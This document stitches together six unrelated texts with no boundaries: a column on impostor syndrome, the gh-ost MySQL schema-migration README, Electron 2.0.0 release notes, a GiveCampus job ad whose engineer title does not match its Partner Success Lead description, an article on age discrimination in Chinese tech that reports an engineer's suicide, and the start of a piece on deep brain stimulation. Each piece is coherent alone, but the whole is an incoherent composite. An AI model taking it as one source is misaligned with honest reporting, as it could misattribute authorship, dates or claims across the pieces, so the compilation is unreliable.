
A strong correlation between impostor syndrome and anxiety, depression, burnout


Authors:
Elizabeth Churchill


“What do you do about stress?” she asked.
“What do you mean by stress?”
“Well… I feel like I will never fit in, like I’ll never be smart enough.
And that makes me stressed all the time.
Does that make sense?”

The young woman with whom I was speaking is the first in her family to enter a Ph.D. program. She excelled in her computer science undergraduate degree. She was admitted to an elite university to study with a key figure in HCI. By all accounts, she is doing extremely well. But she has doubts. Not about the institution, or her supervisor, or her topic, about which she is deeply passionate: She has doubts about herself and her worthiness to be in the program at all.

This is a conversation I have too frequently. It’s a conversation I have with people at all stages of career, sometimes even with my peers. In these conversations, people express fears that they don’t really belong, that they are interlopers who aren’t really “clever enough” or “good enough” or “well-rounded enough” or “deep enough” in their discipline. The fear is that they will be discovered to be in some way wanting, and that they will then be cast out, let go, fired from their positions—the fear of discovery that they are not good enough sometimes overwhelms them.

Over four decades ago, this feeling was found to be very common among high-achieving women; it was given a name, impostor syndrome, by clinical psychologists Pauline Clance and Suzanne Imes in the late 1970s [1]. Follow-on research has shown that impostor syndrome is very real and very prevalent, and that its effects are undeniably negative. Impostor syndrome is associated with overwork, with an overly keen focus on pleasing others, and with an almost desperate drive to constantly achieve more. It is therefore also unsurprising that there is a strong correlation between impostor syndrome and anxiety, stress, depression, and burnout, the debilitating condition of exhaustion that can result in talented individuals giving up on promising careers.

While the initial work that led to the coining of this term focused on women’s experiences of non-belonging and of “impostoritis,” and much published work since has also focused on women, men are not immune to impostor syndrome. I asked some of my male colleagues whether they also experience impostor syndrome and got a resounding yes. In researching the topic for this column, I read an article that suggested even Albert Einstein felt this way at times.

In her book The Secret Thoughts of Successful Women: Why Capable People Suffer from the Impostor Syndrome and How to Thrive in Spite of It, Valerie Young breaks down impostor syndrome and adds nuance, describing different kinds of impostor and their behaviors:

  • The Expert. This manifests as a state of cringing denial when called an expert. It is associated with a constant feeling that there is so much more to know, so much more to do. There is a deep fear of being found out as not knowing everything in the area of work. This can lead to feeling like one doesn’t deserve the job one has.
  • The Perfectionist. Perfectionism underlies a feeling that one could have (and should have) done better. No matter how well the task was done, there is no accepting of compliments and no celebration of achievements. Sometimes there isn’t even a noticing of success, so it is no surprise that self-confidence does not develop.
  • The Superwoman/man. Some people can’t stop working, taking on every task they can. Young argues that this kind of workaholism is the expression of a need for external validation and can be countered only by focusing on setting one’s own metrics for personal success.
  • The Natural Genius. This behavior involves judging one’s worth on the basis of raw ability as opposed to effort. Tendencies toward ridiculously high expectations are coupled with and amplified by the expectation that one will be successful on a first try—the perfect setup for feelings of inadequacy and failure, especially in complex domains.
  • The Rugged Individualist. Rugged individualism demands that all tasks be performed alone, and little to no help is sought. Projects are always framed in terms of their requirements, and personal needs are pushed aside in honor of project demands.

I am sure we all recognize some of these tendencies, and clearly they are linked. One may also feel one kind of anxiety one day and another the next.


There is a strong correlation between impostor syndrome and anxiety, stress, depression, and burnout.


My hunch is that people who are creative, who strive to solve hard problems, who think about the bigger picture, and who are engaged with their topics are the most likely to suffer from impostor syndrome. This makes sense—if you’re constantly striving toward creative expression that pushes the preconceptions of a topic area and that is truly reflective and/or innovative work, you’re likely to focus on what you don’t know so you can chart your learning path. For those who are always challenging themselves and who are facing hard problems, some level of uncertainty is inevitable. These are characteristics of the most creative, inventive minds. But constant self-questioning is a hole through which confidence leaks, creating fertile ground for overwork and negative stress. The classic Yerkes-Dodson law comes to mind in the context of this kind of striving:

The Yerkes-Dodson law is an empirical relationship between arousal and performance, originally developed by psychologists Robert M. Yerkes and John Dillingham Dodson in 1908. The law dictates that performance increases with physiological or mental arousal, but only up to a point [2].

So, when the stress is just right, people will grow by leaps and bounds and be motivated to push forward, learn, and engage with challenges. This is positive stress. As stress increases, there is a point of diminishing returns. At high levels of stress, the person will become debilitated. It is likely that impostor syndrome is spun from such heightened stress and anxiety, as self-questioning sets in around the fear of failure, amplifying the worry further and potentially creating a self-fulfilling prophecy.
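
The inverted-U shape the law describes is often stylized as a simple bell curve; as a hedged illustration (a common textbook stylization, not a formula from the original 1908 paper), performance P at arousal level a can be sketched as

$$ P(a) \approx P_{\max}\, \exp\!\left(-\frac{(a - a^{*})^{2}}{2\sigma^{2}}\right), $$

where a* is the optimal level of arousal and σ controls how quickly performance falls off on either side: too little stress and motivation stays low, too much and performance collapses.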

Before we place too much emphasis on the individual and their striving, though, it is important to note that the feeling of being in an unsafe or precarious situation professionally is not simply a personal trait or tendency. It can be, and usually is, created and maintained by structural biases and very real inequities in one’s social and work environments. There is much evidence that the environment will trigger, feed, and exacerbate impostor syndrome. Feeling like an impostor in one’s professional identity may be triggered or exacerbated by noticing one does not belong in other ways—being part of a minority group that is culturally not the dominant one means one is already an interloper. If you don’t see yourself and your values reflected around you, you may already feel as if you are hiding your difference. At the same time, you’re spending energy looking for validation and looking to sense, ameliorate, and/or avoid subtle rejections.


Research indicates that the culture of an organization or institution is a big factor in whether people feel like they belong and can take risks. One’s sense of belonging and social standing in a work or social context makes all the difference in how one perceives and judges success and failure, and whether one feels the need to hide and guard against taking a “wrong step” or failing at a task. A lack of social belonging can reduce the kind of emotional buoyancy that allows one to realistically evaluate and bounce back from failure, actual or perceived. Cultural programming is also very real. Bragging about your achievements is not considered polite in many cultures; as a U.K. to U.S. transplant, I can attest to the shift I had to go through when I moved to the U.S.

This is perhaps why women may be more likely to feel like impostors, because they typically do not see themselves reflected and reinforced—in some sense, validated—in the same way that men do.

I think impostor syndrome and the concomitant compensatory behaviors are likely to become even more prevalent. Attrition rates in computer science education are high, especially among women and the most creative students, who seek to be interdisciplinary [3]. The current career milieu is also sending a message to creative people that they need to be actively in control of their careers, and that stable work with the commitment of an organization for long-term career development is increasingly tenuous. More and more, careers require self-direction and reflection; there are fewer straight paths to lasting, fulfilling work. That means a great deal of emotional strength is needed to carve out one’s career while avoiding impostoritis and burnout: Forging your own career path takes courage and belief in self, while success is ever more dependent on external validation and social networking.

As an HCI and user experience manager with many creative and bright individuals on my team, I look for people who are willing to challenge the status quo, who bring creative and critical reflection to the table, who are not paralyzed by perfectionism or fear of countering my opinion, and who are oriented to taking risks and learning. Feelings of inadequacy and low self-confidence will drive out argument and creativity and lead to unproductive people-pleasing. We must look at ourselves and others, and recognize if we are starting to experience impostor syndrome or act in such a way as to induce it in others. If you feel this is happening, there are various things you can do to address it (see sidebar).

Cycling back to the young woman whose question sparked my reflections on this all too important topic, I think you might guess what I said to her:

“Oh yes, I am very familiar with that feeling. I actively work on diverting it into a positive challenge rather than a self-abnegation.”

References

1. More on Impostor Syndrome can be found in the Wikipedia article: https://en.wikipedia.org/wiki/Impostor_syndrome

2. For more on this see the original article or the Wikipedia entry: Yerkes, R.M. and Dodson, J.D. The relation of strength of stimulus to rapidity of habit-formation. Journal of Comparative Neurology and Psychology 18 (1908), 459–482; DOI: 10.1002/cne.920180503 and https://en.wikipedia.org/wiki/Yerkes%E2%80%93Dodson_law

3. Many panels have been convened on impostor syndrome, e.g., Feldman, A.L. and McCullough, M. Fighting impostor syndrome (abstract only). Proc. of the 45th ACM Technical Symposium on Computer Science Education. ACM, New York, USA, 2014, 728–728. DOI: http://dx.doi.org/10.1145/2538862.2544236. Also see this Grace Hopper panel: https://www.youtube.com/watch?v=EAw6xWd_Hec

Author

Originally from the U.K., Elizabeth Churchill has been leading corporate research at top U.S. companies for the past 18 years. Her research interests include social media, distributed collaboration, mediated communication, and ubiquitous and embedded computing applications. churchill@acm.org

Sidebar: Dealing with Impostor Syndrome

Treat yourself well.

  • Prioritize your whole self and your overall well-being; you are more than what you do in your course, in your team, or in your organization.
  • Recognize and quell internal monologues of failure or less than optimal performance.
  • Don’t get into unhealthy competition with yourself.
  • Laugh at yourself with compassion.
  • Allow yourself to brag about your successes, and don’t take anyone who teases you about it seriously.

Create your support group; seek positive teachers and mentors.

  • Talk about concerns you have and take feedback, especially positive feedback, seriously.

Manage your relationship with/to work.

  • Remember the reasons why you got into your line of work. And if you find it was because someone else told you to do it and you really don’t care, change your line of work. Allow yourself to consider that perhaps you just aren’t that interested in the topic you used to love. Some of the most successful people have thrived in multiple areas.
  • Establish realistic yardsticks and take input from others on whether goals are achievable.

Understand the natural cycles of knowledge and expertise.

  • Know that knowledge shifts and morphs. You’ll know more about some topics tomorrow, and you’ll forget some things you knew before. Forgive yourself for changing. You may not be as good at something if you haven’t practiced for a while.
  • Let yourself be a novice when you approach a new topic. Force yourself to ask for help, and if you don’t get positive encouragement from the first person you ask, move on and ask someone else until you find someone who loves the topic and loves to learn and loves to encourage others to learn. The keenest minds and deepest domain experts are the ones who truly enjoy sharing their knowledge and inviting others to the party. The dismissive people may themselves be suffering from impostor syndrome.

Understand the importance of culture.

  • Note your cultural programming—are you really feeling like an impostor, or are you afraid to admit you’re good at what you do for fear of being called arrogant? Look for personal cultural differences around bragging, self-promotion, competition, and contribution, including taking responsibility for an honest audit of your own cultural or personal biases.
  • Don’t introduce unhealthy competition into your teams, whether you are a manager or a peer.
  • Introduce play and playfulness into the work world.
  • Know that in 95 percent of situations, you’re part of a bigger social system and you don’t have to do it all. Nor are you responsible for it all. Learn to recognize the traits of toxic settings, situations, and organizations, and if you can’t institute or effect change, leave.


Copyright held by authors

The Digital Library is published by the Association for Computing Machinery. Copyright © 2018 ACM, Inc.


GitHub's online schema migration for MySQL


gh-ost is a triggerless online schema migration solution for MySQL. It is testable and provides pausability, dynamic control/reconfiguration, auditing, and many operational perks.

gh-ost produces a light workload on the master throughout the migration, decoupled from the existing workload on the migrated table.

It has been designed based on years of experience with existing solutions, and changes the paradigm of table migrations.

How?

All existing online-schema-change tools operate in a similar manner: they create a ghost table in the likeness of your original table, migrate that table while empty, slowly and incrementally copy data from your original table to the ghost table, and meanwhile propagate ongoing changes (any INSERT, DELETE, UPDATE applied to your table) to the ghost table. Finally, at the right time, they replace your original table with the ghost table.
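
As a rough sketch of that shared pattern (conceptual only; this is not gh-ost's or any other tool's actual syntax, and the table name, column, and chunk boundaries below are placeholders):

```sh
# Conceptual sketch of the classic online-schema-change flow (placeholders throughout).

# 1. Create an empty ghost table in the likeness of the original.
mysql -e "CREATE TABLE _mytable_ghost LIKE mytable"

# 2. Apply the desired schema change to the still-empty ghost table.
mysql -e "ALTER TABLE _mytable_ghost ADD COLUMN note VARCHAR(255)"

# 3. Slowly copy existing rows in small chunks, while ongoing INSERT/UPDATE/DELETE
#    traffic is propagated to the ghost table (via triggers in older tools,
#    via the binary log in gh-ost's case).
mysql -e "INSERT IGNORE INTO _mytable_ghost (id, data) SELECT id, data FROM mytable WHERE id BETWEEN 1 AND 1000"
#    ...repeat for subsequent chunks...

# 4. At the right time, atomically swap the tables.
mysql -e "RENAME TABLE mytable TO _mytable_old, _mytable_ghost TO mytable"
```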

gh-ost uses the same pattern. However, it differs from all existing tools by not using triggers. We have found triggers to be the source of many limitations and risks.

Instead, gh-ost uses the binary log stream to capture table changes and asynchronously applies them onto the ghost table. gh-ost takes upon itself some tasks that other tools leave for the database to perform. As a result, gh-ost has greater control over the migration process; it can truly suspend it, and it can truly decouple the migration's write load from the master's workload.

In addition, it offers many operational perks that make it safer, trustworthy and fun to use.

gh-ost general flow

Highlights

  • Build your trust in gh-ost by testing it on replicas. gh-ost will issue the same migration flow on a replica as it would on the master, without actually replacing the original table, leaving the replica with two tables you can then compare to satisfy yourself that the tool operates correctly. This is how we continuously test gh-ost in production.
  • True pause: when gh-ost throttles, it truly ceases writes on the master: no row copies and no ongoing events processing. By throttling, you return your master to its original workload.
  • Dynamic control: you can interactively reconfigure gh-ost, even as migration still runs. You may forcibly initiate throttling.
  • Auditing: you may query gh-ost for status. gh-ost listens on unix socket or TCP.
  • Control over cut-over phase: gh-ost can be instructed to postpone what is probably the most critical step: the swap of tables, until such time that you're comfortably available. No need to worry about ETA being outside office hours.
  • External hooks can couple gh-ost with your particular environment.

Please refer to the docs for more information. No, really, read the docs.

Usage

The cheatsheet has it all. You may be interested in invoking gh-ost in various modes:

  • a noop migration (merely testing that the migration is valid and good to go)
  • a real migration, utilizing a replica (the migration runs on the master; gh-ost figures out identities of servers involved. Required mode if your master uses Statement Based Replication)
  • a real migration, run directly on the master (but gh-ost prefers the former)
  • a real migration on a replica (master untouched)
  • a test migration on a replica, the way for you to build trust with gh-ost's operation.

Our tips:

  • Testing above all: try out --test-on-replica the first few times. Better yet, make it continuous. We have multiple replicas on which we iterate through our entire fleet of production tables, migrating them one by one, checksumming the results, and verifying the migration is good.
  • For each master migration, first issue a noop
  • Then issue the real thing via --execute.

More tips (a combined invocation sketch follows this list):

  • Use --exact-rowcount for accurate progress indication
  • Use --postpone-cut-over-flag-file to gain control over cut-over timing
  • Get familiar with the interactive commands
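
Putting the flags above together, a minimal invocation might look like the sketch below (the hostname, credentials, schema, table, and ALTER statement are placeholders; the cheatsheet and docs remain the authoritative flag reference):

```sh
# Noop dry run (no --execute): validates connectivity, privileges, and the migration plan.
gh-ost \
  --host=replica.example.com \
  --user=ghost_user \
  --password=ghost_pass \
  --database=mydb \
  --table=mytable \
  --alter="ADD COLUMN note VARCHAR(255)" \
  --exact-rowcount \
  --postpone-cut-over-flag-file=/tmp/ghost.postpone.flag \
  --verbose

# If the noop looks good, run the same command again with --execute added,
# then delete the postpone flag file when you are ready to cut over.
```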

Also see:

What's in a name?

Originally this was named gh-osc: GitHub Online Schema Change, in the likes of Facebook online schema change and pt-online-schema-change.

But then a rare genetic mutation happened, and the c transformed into t. And that sent us down the path of trying to figure out a new acronym. gh-ost (pronounced: Ghost) stands for GitHub's Online Schema Transmogrifier/Translator/Transformer/Transfigurator.

License

gh-ost is licensed under the MIT license

gh-ost uses 3rd party libraries, each with their own license. These are found here.

Community

gh-ost is released at a stable state, but with mileage to go. We are open to pull requests. Please first discuss your intentions via Issues.

We develop gh-ost at GitHub and for the community. We may have different priorities than others. From time to time we may suggest a contribution that is not on our immediate roadmap but which may appeal to others.

Please see Coding gh-ost for a guide to getting started developing with gh-ost.

Download/binaries/source

gh-ost is now GA and stable.

gh-ost is available in binary format for Linux and Mac OS/X

Download latest release here

gh-ost is a Go project; it is built with Go 1.8 (though 1.7 should work as well). To build on your own, use either:

  • script/build - this is the same build script used by CI and hence the authoritative one; the artifact is the ./bin/gh-ost binary.
  • build.sh for building tar.gz artifacts in /tmp/gh-ost

Generally speaking, the master branch is stable, but only releases are to be used in production.

Authors

gh-ost is designed, authored, reviewed and tested by the database infrastructure team at GitHub:

Electron 2.0.0


After more than four months of development, eight beta releases, and worldwide testing from many apps' staged rollouts, the release of Electron 2.0.0 is now available from electronjs.org.


Starting with 2.0.0, Electron's releases will follow semantic versioning. This means the major version will bump more often and will usually be a major update to Chromium. Patch releases should be more stable because they will contain only high-priority bug fixes.

Electron 2.0.0 also represents an improvement to how Electron is stabilized before a major release. Several large scale Electron apps have included 2.0.0 betas in staged rollouts, providing the best feedback loop Electron's ever had for a beta series.

  • Major bumps to several important parts of Electron's toolchain, including Chrome 61, Node 8.9.3, V8 6.1.534.41, GTK+ 3 on Linux, updated spellchecker, and Squirrel.
  • In-app purchases are now supported on macOS. #11292
  • New API for loading files. #11565
  • New API to enable/disable a window. #11832
  • New API app.setLocale(). #11469
  • New support for logging IPC messages. #11880
  • New menu events. #11754
  • Add a shutdown event to powerMonitor. #11417
  • Add affinity option for gathering several BrowserWindows into a single process. #11501
  • Add the ability for saveDialog to list available extensions. #11873
  • Support for additional notification actions #11647
  • The ability to set macOS notification close button title. #11654
  • Add conditional for menu.popup(window, callback)
  • Memory improvements in touchbar items. #12527
  • Improved security recommendation checklist.
  • Add App-Scoped Security scoped bookmarks. #11711
  • Add ability to set arbitrary arguments in a renderer process. #11850
  • Add accessory view for format picker. #11873
  • Fixed network delegate race condition. #12053
  • Changed to make sure webContents.isOffscreen() is always available. #12531
  • Fixed BrowserWindow.getFocusedWindow() when DevTools is undocked and focused. #12554
  • Fixed preload not loading in sandboxed render if preload path contains special chars. #12643
  • Correct the default of allowRunningInsecureContent as per docs. #12629
  • Fixed transparency on nativeImage. #12683
  • Fixed issue with Menu.buildFromTemplate. #12703
  • Confirmed menu.popup options are objects. #12330
  • Removed a race condition between new process creation and context release. #12361
  • Update draggable regions when changing BrowserView. #12370
  • Fixed menubar toggle alt key detection on focus. #12235
  • Fixed incorrect warnings in webviews. #12236
  • Fixed inheritance of 'show' option from parent windows. #122444
  • Ensure that getLastCrashReport() is actually the last crash report. #12255
  • Fixed require on network share path. #12287
  • Fixed context menu click callback. #12170
  • Fixed popup menu position. #12181
  • Improved libuv loop cleanup. #11465
  • Fixed hexColorDWORDToRGBA for transparent colors. #11557
  • Fixed null pointer dereference with getWebPreferences api. #12245
  • Fixed a cyclic reference in menu delegate. #11967
  • Fixed protocol filtering of net.request. #11657
  • WebFrame.setVisualZoomLevelLimits now sets user-agent scale constraints #12510
  • Set appropriate defaults for webview options. #12292
  • Improved vibrancy support. #12157, #12171, #11886
  • Fixed timing issue in singleton fixture.
  • Fixed broken production cache in NotifierSupportsActions()
  • Made MenuItem roles camelCase-compatible. #11532
  • Improved touch bar updates. #11812, #11761.
  • Removed extra menu separators. #11827
  • Fixed Bluetooth chooser bug. Closes #11399.
  • Fixed macOS Full Screen Toggle menu item label. #11633
  • Improved tooltip hiding when a window is deactivated. #11644
  • Migrated deprecated web-view method. #11798
  • Fixed closing a window opened from a browserview. #11799
  • Fixed Bluetooth chooser bug. #11492
  • Updated to use task scheduler for app.getFileIcon API. #11595
  • Changed to fire console-message event even when rendering offscreen. #11921
  • Fixed downloading from custom protocols using WebContents.downloadURL. #11804
  • Fixed transparent windows losing transparency when devtools detaches. #11956
  • Fixed Electron apps canceling restart or shutdown. #11625

macOS

  • Fixed event leak on reuse of touchbar item. #12624
  • Fixed tray highlight in darkmode. #12398
  • Fixed blocking main process for async dialog. #12407
  • Fixed setTitle tray crash. #12356
  • Fixed crash when setting dock menu. #12087

Linux

Windows

  • Added Visual Studio 2017 support. #11656
  • Fixed passing of exception to the system crash handler. #12259
  • Fixed hiding tooltip from minimized window. #11644
  • Fixed desktopCapturer to capture the correct screen. #11664
  • Fixed disableHardwareAcceleration with transparency. #11704

The Electron team is hard at work to support newer versions of Chromium, Node, and V8. Expect 3.0.0-beta.1 soon!

GiveCampus (YC S15) hiring front-end engineers who care about education


PARTNER SUCCESS LEAD

At GiveCampus, we don’t just provide schools with awesome technology. We actively partner with them to make sure they get maximum value from that technology. And we invest heavily in gathering and sharing data and analytics, best practices, and lessons learned.

We are searching for a top-notch Partner Success Lead to enhance and expand these efforts. This person will own all elements of the GiveCampus partner experience: product, process, and everything in between. They will be a core part of our team and serve as the primary interface for schools using GiveCampus. Broadly speaking, they will be in charge of optimizing schools’ use of GiveCampus, partner renewal/retention, and supporting the expansion of partnerships over time.

Responsibilities will include:

  • Onboarding new partners: Understanding their needs and requirements, the priorities and pain points they want to address, what they want to achieve, and how they will measure success; and familiarizing them with GiveCampus, the benefits of specific features/functionality, and how other schools use the platform.
  • Helping schools set up and run campaigns on GiveCampus; proactively sharing best practices; and, when appropriate, engaging schools to prevent sub-optimal results.
  • Producing content to educate schools about GiveCampus capabilities, the value of specific features and functionality, and examples of how schools can benefit from them (e.g., knowledge base articles/blog posts, newsletters, in-product “How to” guides, FAQs, and training materials).
  • Tracking and analyzing partner usage of GiveCampus, success rates/trends, and satisfaction; engaging partners accordingly and modifying processes to improve outcomes in all of these areas (e.g., to increase platform usage) and minimize churn.
  • Implementing an efficient system for communicating with partners and tracking those communications.
  • Gathering feedback from schools and collaborating with our designers and engineers to translate this feedback into platform enhancements, new features, etc. (Note: The Partner Success Lead will play a significant role in shaping our product roadmap.)
  • Conducting periodic (~quarterly) reviews with each partner to understand their evolving needs and priorities and ensure that they are getting their expected value out of GiveCampus.
  • Generating intellectual capital regarding GiveCampus and digital fundraising and engagement writ large (e.g., best practices, lessons learned, data/analytics, etc.); managing distribution of this intellectual capital to our partners.
  • Working closely with our sales team to maximize renewal/retention and make partners aware of new opportunities as we expand our product and services.
  • Working closely with our marketing team to ensure our marketing strategy is aligned with the key value our partners derive from GiveCampus; identifying success stories for testimonials and case studies that highlight this value.

Key things we'll be looking for:

  • An engaging personality, a healthy sense of humor, and exceptional people skills (e.g., someone we want to get stuck in an airport with).
  • Customer-facing experience such as sales, account management, customer success, customer support, and/or consulting (extra credit if this experience is related to SaaS products, B2B or enterprise sales, and/or the education or non-profit market).
  • Empathy and exceptional listening skills--you need to be able to get to the bottom of all sorts of questions.
  • The ability to communicate clearly and concisely, including when explaining new technology or unfamiliar concepts.
  • An appreciation for the critical importance of EVERY interaction.
  • Keen attention to detail and an obsession with providing delightful partner experiences.

Extra credit if you have:

  • Experience working in advancement/development or alumni relations at an educational institution or other non-profit.
  • Experience at a tech start-up.
  • Experience with crowdfunding, peer-to-peer fundraising, or other fundraising activities.
  • Volunteered to help a school raise money or engage its alumni (e.g., as a “class agent”, “class chair/ambassador”, or “reunion committee member”).
  • Experience with customer relationship management (CRM) software such as Salesforce, Sugar CRM, or Close.io.


Over 30? Too Old for Tech Jobs in China


Ou Jianxin said goodbye to his wife and two young children shortly after 9 a.m. on a cold day last December. He was on his way to Chinese smartphone maker ZTE Corp.’s Shenzhen headquarters—he’d been let go from his job as a research engineer at the company more than a week before, but management had asked to speak with him again, he said. “There are internal conflicts in our company,” he told his wife. “I’m very likely to be the victim of that.” Whether there was an actual meeting is unclear. What is clear is that sometime after he arrived, Ou went to his former office on the 26th floor of the campus’s research and development building and jumped to his death. He was 42 years old.

Four days later, Ou’s widow wrote a post on the blogging platform Meipian about her husband and the circumstances of his death. According to her account, ZTE refused to give a reason for Ou’s dismissal. Neither Ou’s widow nor representatives from ZTE responded to requests for comment, though Ou’s widow took down her post, according to the site, within two days after a reporter from Bloomberg Businessweek attempted to contact the company.

Nevertheless, Ou’s story took on a life of its own. In its four months online, the Meipian post became a viral phenomenon—the platform registered only that it had been viewed more than 100,000 times, but via media coverage and word-of-mouth, the story would have reached millions. Why ZTE let Ou go remains a mystery, as does Ou’s reason for ending his life. But to the people discussing his story online, none of that mattered. Almost immediately, readers seized on his age: At 42, he would have already been considered too old to be an engineer in China, where three-quarters of tech workers are younger than 30, according to China’s largest jobs website, Zhaopin.com. The online discussion gave vent to an anxiety that’s been building for years. Chinese internet users call it the “30+ middle-aged crisis.”

Despite her bobbed black hair, smooth complexion, and schoolgirlish appearance, Helen He, a tech recruiter in Shanghai, is well-acquainted with age-related pressures: Now 38, she’s been told by her bosses not to recruit anyone older than 35. “Most people in their 30s are married and have to take care of their family—they’re not able to focus on the high-intensity work,” she says, parroting the conventional wisdom, though she also may be talking about her own future should she find herself back on the job market. “If a 35-year-old candidate isn’t seeking to be a manager, a hiring company wouldn’t even give that CV a glance.”

The idealization of youth is in the DNA of the American tech industry. Steve Jobs, Bill Gates, and Mark Zuckerberg all famously dropped out of college to start Apple, Microsoft, and Facebook, respectively, and imbued their companies’ culture with a puckish distrust of authority. Google has been fighting an age-related class-action suit in California since 2015, and in March, a ProPublica investigation showed that International Business Machines Corp. cut 20,000 older employees in the U.S. in the past five years to “sharply increase hiring of people born after 1980.” Both companies say they comply with employment laws.

In China, the discrimination begins even younger than in the U.S. The irony is that most of the country’s famous tech companies were started by men older than 30. Lei Jun founded smartphone maker Xiaomi Inc., expected to go public this year with a valuation of at least $80 billion, at age 40. Jack Ma was 34 when he opened the online shopping colossus Alibaba Group Holding Ltd., and Robin Li was 31 when he built the search engine Baidu. An exception among the current leaders is Tencent Holdings Ltd.’s Pony Ma, who was 27 when he created the company behind the popular social media app WeChat. The industry’s rising generation, however—Cheng Wei of taxi app Didi Chuxing and Zhang Yiming of news app Toutiao—established their businesses in their 20s.

The pressure on older workers exists across China’s industries, but it’s particularly acute in tech, where the frenzy to hire young talent reveals the extent of the country’s desire to prove itself as a global leader. China has used tech advancements to propel its economy forward for decades, but President Xi Jinping’s Made in China 2025 plan kicked activity into a higher gear. As Xi’s political power has grown, so has the urgency in the industry to carry out his ambition: to dominate the world in advanced technologies, including semiconductors and artificial intelligence.

On its face, Ou’s death bears similarities to the wave of suicides among low-wage workers at Foxconn Technology Group factories in 2010 and 2011, which were widely attributed to labor abuses. What readers responded to in his story, though, is of a different nature. In a country of 1.4 billion people, many Chinese tech companies are able to move faster than their overseas rivals by throwing people at a problem, and younger workers cost less than their more experienced colleagues. Anxious to keep up with fierce competition, Chinese internet companies often expect their employees to work a so-called 996 schedule: 9 a.m. to 9 p.m., 6 days a week, including holidays. After age 30, tech recruiter He wrote in a post on the question-and-answer website Zhihu, it’s harder to recover from late nights, and as your priorities shift from job to family, working overtime becomes a greater burden. “In HR,” she says, “I’ve found that 30 years old is already the beginning of the middle-aged crisis.”


A search on Zhaopin.com reveals tens of thousands of job postings calling for applicants younger than 35: They include one from e-commerce retailer JD.com Inc. seeking someone with a master’s degree for a senior manager position and a sales position at travel website Ctrip for which applicants are required to be from 20 to 28. (JD.com says it strictly forbids hiring restrictions based on age or gender. Ctrip declined to comment.) A recent job posting for a front-end developer at a Beijing tech startup explained that the company is willing to relax its requirements for educational attainment but not for age; a college degree isn’t strictly necessary, but if you’re older than 30, don’t bother applying. “Working in tech is like being a professional athlete,” says Robin Chan, an entrepreneur and angel investor in companies such as Xiaomi and Twitter Inc. “You work extremely hard from 20 to 40 years old and hope you hit it big. After that, it’s time to move on to something else and let someone younger try their hand.”

China has national laws prohibiting discrimination based on gender, religion, and disability, but declining to hire someone based on age is perfectly legal. “Age-dismissal victims rarely ask for help from lawyers,” says Lu Jun, a social activist and visiting scholar at Fordham University School of Law who fought successfully for legislation prohibiting Chinese employers from discriminating against hepatitis B carriers, formerly a common practice. With no statutory basis for a lawsuit, direct action is rare, but there are other ways to apply pressure. In 2011 the Shenzhen Stock Exchange posted a recruitment notice on its website asking for applicants younger than 28. The director of a local nonprofit wrote an open letter about the listing to the municipal bureau of human resources and social security. The media picked up the story, and after the stock exchange conducted an investigation into the listing, it was taken down.

Public entities are particularly good targets because they’re often viewed as examples by the private sector—force the government to change, Lu says, and the effects will trickle down. Last fall, shortly before Ou’s story began circulating, human-rights lawyer Zhang Keke heard from several colleagues about a job listing for a clerk’s position in the public prosecutor’s office in Shenzhen. The upper age limit was 28. “I really can’t believe that such things could happen in Shenzhen, an open city compared with other cities in China,” he says. China’s fifth-largest city, Shenzhen is considered to be the nation’s Silicon Valley—in addition to ZTE, Tencent and Huawei are headquartered there—and as such it tends to be more progressive.

Zhang is known for taking on controversial cases, including defending members of the banned Falun Gong spiritual group, and belongs to a network of public-interest lawyers created two years ago to handle discrimination cases. He sent the Shenzhen job posting around to his network and eventually assembled a group of eight lawyers to write an open letter to the Shenzhen prosecutor’s office recommending that it replace age limits with a merit-based exam. They met with textbook bureaucratic runaround: After two months with no response, the lawyers sent their complaint letter to the provincial prosecutor’s office and the city’s personnel bureau, which handles HR issues for government agencies; the bureau punted the case to another judicial agency, which didn’t respond. They then sent the letter to the head of the Shenzhen prosecutor’s office, who explained that the age limit was set by party officials. The prosecutor’s office didn’t respond to requests for comment.

“It’s very common the government doesn’t do anything about it at first,” says Lu of complaints about government agencies. Zhang is considering bringing the case to other government authorities but has no firm plan yet. “This is just an idea at the moment,” he says. One of the other people involved, Wang Le, a 31-year-old lawyer from Hunan, says that as it’s the prosecutor’s duty to uphold the law, the office should be held to a higher standard than other government agencies. “Plus, we are all lawyers over age 28.”

Not everyone in China has responded to age-related hiring pressure by trying to fight it. There are those who say the system has taught them to work harder than their thirtysomething peers. Getting downsized out of his IT job at Nokia Corp. in Chengdu “pushed me to change and improve my skills to get a better job,” says Liu Huai Yi, 33. “I don’t buy the idea that after 35 you can’t get a job. Someone in IT has to just keep learning to keep up.” After searching for eight months, he was hired in another IT position at a multinational health-care company, which will offer more job security.

The competition for top tech talent has prompted higher salaries and relaxed age requirements for those skilled in complex fields such as AI and machine learning, which tend to require advanced degrees. If nothing else, China’s shifting age dynamics will force the issue. Forty-seven percent of China’s population is older than 40, up from 30 percent two decades ago, according to the World Bank Group. That number is projected to rise to 55 percent by 2030. Despite the end of the one-child policy, births fell last year to 17.2 million, from 18.5 million in 2016. He, the tech recruiter, remains hopeful that age discrimination will eventually disappear in China. A graying population means there will be fewer young candidates to choose from, she says. “If you have no more young employees, you will have no other choice.”

For now, He is preparing for the day she’ll be considered too old for her job. She has a second apartment in Shanghai that she rents out for extra cash, but she has also dreamed of writing a book and is banking on an encore career as an author and online influencer. She started a WeChat blog where readers can tip her if they like her articles, and along with more than a dozen fellow recruiters, she published an e-book in April on how companies can use WeChat to reach job candidates.

She advises others to follow her lead. “We worry that as we get older we might lose our jobs. How will we support our family and live a good life then?” asks He. “We have to start doing something about it now.” —With Mengchen Lu, Gao Yuan, and Charlie Zhu

Can You Overdose on Happiness?


It is a good question, but I was a little surprised to see it as the title of a research paper in a medical journal: “How Happy Is Too Happy?”

Yet there it was in a publication from 2012. The article was written by two Germans and an American, and they were grappling with the issue of how we should deal with the possibility of manipulating people’s moods and feeling of happiness through brain stimulation. If you have direct access to the reward system and can turn the feeling of euphoria up or down, who decides what the level should be? The doctors or the person whose brain is on the line?

What happiness looks like: Deep brain stimulation involves the implantation of electrodes in the brain, linked through the scalp to wires leading to a battery implanted below the skin. This sends electrical impulses to specific areas of the brain. (Photo: Pasieka / Getty Images)

